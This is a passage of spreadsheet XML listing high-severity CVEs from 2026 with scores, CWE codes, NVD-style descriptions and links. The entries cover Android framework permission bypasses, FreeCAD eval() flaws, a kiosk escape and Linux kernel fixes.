      </c>
      <c r="D706" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E706" s="5" t="inlineStr"/>
      <c r="F706" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G706" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H706" s="5" t="inlineStr"/>
      <c r="I706" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J706" s="5" t="inlineStr"/>
      <c r="K706" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="L706" s="5" t="inlineStr">
        <is>
          <t>In onCreate of SlicePermissionActivity.java, there is a possible permission bypass due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M706" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28614</t>
        </is>
      </c>
    </row>
    <row r="707">
      <c r="A707" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B707" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28631</t>
        </is>
      </c>
      <c r="C707" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D707" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E707" s="5" t="inlineStr"/>
      <c r="F707" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G707" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H707" s="5" t="inlineStr"/>
      <c r="I707" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J707" s="5" t="inlineStr"/>
      <c r="K707" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="L707" s="5" t="inlineStr">
        <is>
          <t>In buildMiniResolver of IntentForwarderActivity.java, there is a possible consent bypass due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M707" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28631</t>
        </is>
      </c>
    </row>
    <row r="708">
      <c r="A708" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B708" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28634</t>
        </is>
      </c>
      <c r="C708" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D708" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E708" s="5" t="inlineStr"/>
      <c r="F708" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G708" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H708" s="5" t="inlineStr"/>
      <c r="I708" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J708" s="5" t="inlineStr"/>
      <c r="K708" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L708" s="5" t="inlineStr">
        <is>
          <t>In handleUssdRequest of PhoneInterfaceManager.java, there is a possible way to send a USSD request without permission due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M708" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28634</t>
        </is>
      </c>
    </row>
    <row r="709">
      <c r="A709" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B709" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28636</t>
        </is>
      </c>
      <c r="C709" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D709" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E709" s="5" t="inlineStr"/>
      <c r="F709" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G709" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H709" s="5" t="inlineStr"/>
      <c r="I709" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J709" s="5" t="inlineStr"/>
      <c r="K709" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="L709" s="5" t="inlineStr">
        <is>
          <t>In setupLayout of PickActivity.java, there is a possible bypass of the "Install unknown apps" security restriction due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M709" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28636</t>
        </is>
      </c>
    </row>
    <row r="710">
      <c r="A710" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B710" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28642</t>
        </is>
      </c>
      <c r="C710" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D710" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E710" s="5" t="inlineStr"/>
      <c r="F710" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G710" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H710" s="5" t="inlineStr"/>
      <c r="I710" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J710" s="5" t="inlineStr"/>
      <c r="K710" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L710" s="5" t="inlineStr">
        <is>
          <t>In executeRequest of ActivityStarter.java, there is a possible background activity launch due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M710" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28642</t>
        </is>
      </c>
    </row>
    <row r="711">
      <c r="A711" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B711" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28644</t>
        </is>
      </c>
      <c r="C711" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D711" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E711" s="5" t="inlineStr"/>
      <c r="F711" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G711" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H711" s="5" t="inlineStr"/>
      <c r="I711" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J711" s="5" t="inlineStr"/>
      <c r="K711" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="L711" s="5" t="inlineStr">
        <is>
          <t>In startNextMatchingActivity of ActivityTaskManagerService.java, there is a possible permission bypass due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M711" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28644</t>
        </is>
      </c>
    </row>
    <row r="712">
      <c r="A712" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B712" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28650</t>
        </is>
      </c>
      <c r="C712" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D712" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E712" s="5" t="inlineStr"/>
      <c r="F712" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G712" s="5" t="inlineStr">
        <is>
          <t>windows, java</t>
        </is>
      </c>
      <c r="H712" s="5" t="inlineStr"/>
      <c r="I712" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J712" s="5" t="inlineStr"/>
      <c r="K712" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L712" s="5" t="inlineStr">
        <is>
          <t>In setHiddenWhileSuspended of WindowState.java, there is a possible overlay bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M712" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28650</t>
        </is>
      </c>
    </row>
    <row r="713">
      <c r="A713" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B713" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28655</t>
        </is>
      </c>
      <c r="C713" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D713" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E713" s="5" t="inlineStr"/>
      <c r="F713" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G713" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H713" s="5" t="inlineStr"/>
      <c r="I713" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J713" s="5" t="inlineStr"/>
      <c r="K713" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L713" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of RemoteViews.java, there is a possible background activity launch bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M713" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28655</t>
        </is>
      </c>
    </row>
    <row r="714">
      <c r="A714" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B714" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28657</t>
        </is>
      </c>
      <c r="C714" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D714" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E714" s="5" t="inlineStr"/>
      <c r="F714" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G714" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H714" s="5" t="inlineStr"/>
      <c r="I714" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J714" s="5" t="inlineStr"/>
      <c r="K714" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="L714" s="5" t="inlineStr">
        <is>
          <t>In onActivityResult of AppWidgetConfigActivityProxy.java, there is a possible unauthorized URI permission grant due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M714" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28657</t>
        </is>
      </c>
    </row>
    <row r="715">
      <c r="A715" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B715" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28658</t>
        </is>
      </c>
      <c r="C715" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D715" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E715" s="5" t="inlineStr"/>
      <c r="F715" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G715" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H715" s="5" t="inlineStr"/>
      <c r="I715" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J715" s="5" t="inlineStr"/>
      <c r="K715" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L715" s="5" t="inlineStr">
        <is>
          <t>In findMetaAuthUid of AccountsDb.java, there is a possible frp bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M715" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28658</t>
        </is>
      </c>
    </row>
    <row r="716">
      <c r="A716" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B716" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28663</t>
        </is>
      </c>
      <c r="C716" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D716" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E716" s="5" t="inlineStr"/>
      <c r="F716" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G716" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H716" s="5" t="inlineStr"/>
      <c r="I716" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J716" s="5" t="inlineStr"/>
      <c r="K716" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L716" s="5" t="inlineStr">
        <is>
          <t>In buildIntentSenderForUser of LauncherAppsService.java, there is a possible way to launch an activity from the background due to BAL Bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M716" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28663</t>
        </is>
      </c>
    </row>
    <row r="717">
      <c r="A717" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B717" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-30512</t>
        </is>
      </c>
      <c r="C717" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D717" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E717" s="5" t="inlineStr"/>
      <c r="F717" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G717" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H717" s="5" t="inlineStr"/>
      <c r="I717" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J717" s="5" t="inlineStr"/>
      <c r="K717" s="5" t="inlineStr">
        <is>
          <t>CWE-250</t>
        </is>
      </c>
      <c r="L717" s="5" t="inlineStr">
        <is>
          <t>A local privilege escalation vulnerability exists in the Restricted Access (Kiosk) Mode implementation of Scheidt &amp; Bachmann entervo HMI prior to V2 R5 P0 M5. The vulnerability affects the external PDF viewer functionality used to display the application manual and its interaction with the underlying Windows operating system. An authenticated low-privileged user can escape the kiosk environment by opening the application manual in the external PDF viewer and abusing the print functionality. Successful exploitation allows execution of arbitrary commands outside the kiosk environment with local administrator privileges.</t>
        </is>
      </c>
      <c r="M717" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-30512</t>
        </is>
      </c>
    </row>
    <row r="718">
      <c r="A718" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B718" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-34398</t>
        </is>
      </c>
      <c r="C718" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D718" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E718" s="5" t="inlineStr"/>
      <c r="F718" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G718" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H718" s="5" t="inlineStr"/>
      <c r="I718" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J718" s="5" t="inlineStr"/>
      <c r="K718" s="5" t="inlineStr">
        <is>
          <t>CWE-95</t>
        </is>
      </c>
      <c r="L718" s="5" t="inlineStr">
        <is>
          <t>FreeCAD is a free and open-source multiplatform 3D parametric modeler. From 0.19 until 1.1.1, src/Mod/BIM/bimcommands/BimProjectManager.py in the BIM Project Manager Load Template flow passes attacker-controlled FCStd Meta property values for wpposition, wpu, wpv, and wpaxis directly to eval(), allowing arbitrary Python code execution when a user loads a malicious BIM project template. This issue is fixed in version 1.1.1.</t>
        </is>
      </c>
      <c r="M718" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-34398</t>
        </is>
      </c>
    </row>
    <row r="719">
      <c r="A719" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B719" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-34399</t>
        </is>
      </c>
      <c r="C719" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D719" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E719" s="5" t="inlineStr"/>
      <c r="F719" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G719" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H719" s="5" t="inlineStr"/>
      <c r="I719" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J719" s="5" t="inlineStr"/>
      <c r="K719" s="5" t="inlineStr">
        <is>
          <t>CWE-95</t>
        </is>
      </c>
      <c r="L719" s="5" t="inlineStr">
        <is>
          <t>FreeCAD is a free and open-source multiplatform 3D parametric modeler. From 0.19 until 1.1.1, FreeCAD's BIM Workbench contains an eval() call on untrusted data from SVG template files. When a user creates a TechDraw page from a malicious SVG template, arbitrary Python code executes. The vulnerable code is in src/Mod/BIM/bimcommands/BimTDPage.py (line 87). This issue is fixed in version 1.1.1.</t>
        </is>
      </c>
      <c r="M719" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-34399</t>
        </is>
      </c>
    </row>
    <row r="720">
      <c r="A720" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B720" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45520</t>
        </is>
      </c>
      <c r="C720" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D720" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E720" s="5" t="inlineStr"/>
      <c r="F720" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G720" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H720" s="5" t="inlineStr"/>
      <c r="I720" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J720" s="5" t="inlineStr"/>
      <c r="K720" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="L720" s="5" t="inlineStr">
        <is>
          <t>In onAttach of BiometricsSettingsBase.java, there is a possible authentication bypass due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M720" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45520</t>
        </is>
      </c>
    </row>
    <row r="721">
      <c r="A721" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B721" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45998</t>
        </is>
      </c>
      <c r="C721" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D721" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E721" s="5" t="inlineStr"/>
      <c r="F721" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G721" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H721" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I721" s="5" t="inlineStr">
        <is>
          <t>2026-05-27</t>
        </is>
      </c>
      <c r="J721" s="5" t="inlineStr"/>
      <c r="K721" s="5" t="inlineStr">
        <is>
          <t>CWE-416, CWE-825</t>
        </is>
      </c>
      <c r="L721" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
rxrpc: Fix potential UAF after skb_unshare() failure
If skb_unshare() fails to unshare a packet due to allocation failure in
rxrpc_input_packet(), the skb pointer in the parent (rxrpc_io_thread())
will be NULL'd out.  This will likely cause the call to
trace_rxrpc_rx_done() to oops.
Fix this by moving the unsharing down to where rxrpc_input_call_event()
calls rxrpc_input_call_packet().  There are a number of places prior to
that where we ignore DATA packets for a variety of reasons (such as the
call already being complete) for which an unshare is then avoided.
And with that, rxrpc_input_packet() doesn't need to take a pointer to the
pointer to the packet, so change that to just a pointer.</t>
        </is>
      </c>
      <c r="M721" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45998</t>
        </is>
      </c>
    </row>
    <row r="722">
      <c r="A722" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B722" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46117</t>
        </is>
      </c>
      <c r="C722" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D722" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E722" s="5" t="inlineStr"/>
      <c r="F722" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G722" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H722" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I722" s="5" t="inlineStr">
        <is>
          <t>2026-05-28</t>
        </is>
      </c>
      <c r="J722" s="5" t="inlineStr"/>
      <c r="K722" s="5" t="inlineStr">
        <is>
          <t>CWE-1288, CWE-617</t>
        </is>
      </c>
      <c r="L722" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/mana: Remove user triggerable WARN_ON() in mana_ib_create_qp_rss()
Sashiko points out that the user can specify WQs sharing the same CQ as a
part of the uAPI and this will trigger the WARN_ON() then go on to corrupt
the kernel.
Just reject it outright and fail the QP creation.</t>
        </is>
      </c>
      <c r="M722" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46117</t>
        </is>
      </c>
    </row>
    <row r="723">
      <c r="A723" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B723" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46145</t>
        </is>
      </c>
      <c r="C723" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D723" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E723" s="5" t="inlineStr"/>
      <c r="F723" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G723" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H723" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I723" s="5" t="inlineStr">
        <is>
          <t>2026-05-28</t>
        </is>
      </c>
      <c r="J723" s="5" t="inlineStr"/>
      <c r="K723" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L723" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/mana: Validate rx_hash_key_len
Sashiko points out that rx_hash_key_len comes from a uAPI structure and is
blindly passed to memcpy, allowing the userspace to trash kernel
memory. Bounds check it so the memcpy cannot overflow.</t>
        </is>
      </c>
      <c r="M723" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46145</t>
        </is>
      </c>
    </row>
    <row r="724">
      <c r="A724" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B724" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46189</t>
        </is>
      </c>
      <c r="C724" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D724" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E724" s="5" t="inlineStr"/>
      <c r="F724" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G724" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H724" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I724" s="5" t="inlineStr">
        <is>
          <t>2026-05-28</t>
        </is>
      </c>
      <c r="J724" s="5" t="inlineStr"/>
      <c r="K724" s="5" t="inlineStr">
        <is>
          <t>CWE-415, CWE-763</t>
        </is>
      </c>
      <c r="L724" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/vmw_pvrdma: Fix double free on pvrdma_alloc_ucontext() error path
Sashiko points out that pvrdma_uar_free() is already called within
pvrdma_dealloc_ucontext(), so calling it before triggers a double free.</t>
        </is>
      </c>
      <c r="M724" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46189</t>
        </is>
      </c>
    </row>
    <row r="725">
      <c r="A725" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B725" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49881</t>
        </is>
      </c>
      <c r="C725" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D725" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E725" s="5" t="inlineStr"/>
      <c r="F725" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G725" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H725" s="5" t="inlineStr"/>
      <c r="I725" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J725" s="5" t="inlineStr"/>
      <c r="K725" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L725" s="5" t="inlineStr">
        <is>
          <t>In serviceClassExists of InCallController.java, there is a possible arbitrary code execution due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M725" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49881</t>
        </is>
      </c>
    </row>
    <row r="726">
      <c r="A726" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B726" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49932</t>
        </is>
      </c>
      <c r="C726" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D726" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E726" s="5" t="inlineStr"/>
      <c r="F726" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G726" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H726" s="5" t="inlineStr"/>
      <c r="I726" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J726" s="5" t="inlineStr"/>
      <c r="K726" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L726" s="5" t="inlineStr">
        <is>
          <t>In parseParts of PduParser.java, there is a possible out of bounds read due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M726" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49932</t>
        </is>
      </c>
    </row>
    <row r="727">
      <c r="A727" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B727" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52987</t>
        </is>
      </c>
      <c r="C727" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D727" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E727" s="5" t="inlineStr"/>
      <c r="F727" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G727" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H727" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I727" s="5" t="inlineStr">
        <is>
          <t>2026-06-24</t>
        </is>
      </c>
      <c r="J727" s="5" t="inlineStr"/>
      <c r="K727" s="5" t="inlineStr">
        <is>
          <t>CWE-1341</t>
        </is>
      </c>
      <c r="L727" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu: avoid double drm_exec_fini() in userq validate
When new_addition is true, amdgpu_userq_vm_validate() calls
drm_exec_fini(&amp;exec) before iterating over the collected HMM ranges and
calling amdgpu_ttm_tt_get_user_pages().
If amdgpu_ttm_tt_get_user_pages() fails in that path, the code jumps to
unlock_all and calls drm_exec_fini(&amp;exec) a second time on the same
exec object. drm_exec_fini() is not idempotent: it frees exec-&gt;objects
and may also drop exec-&gt;contended and finalize the ww acquire context.
Route that error path directly to the range cleanup once exec has
already been finalized.
Issue found using a prototype static analysis tool
and confirmed by code review.
(cherry picked from commit 2802952e4a07306da6ebe813ff1acacc5691851a)</t>
        </is>
      </c>
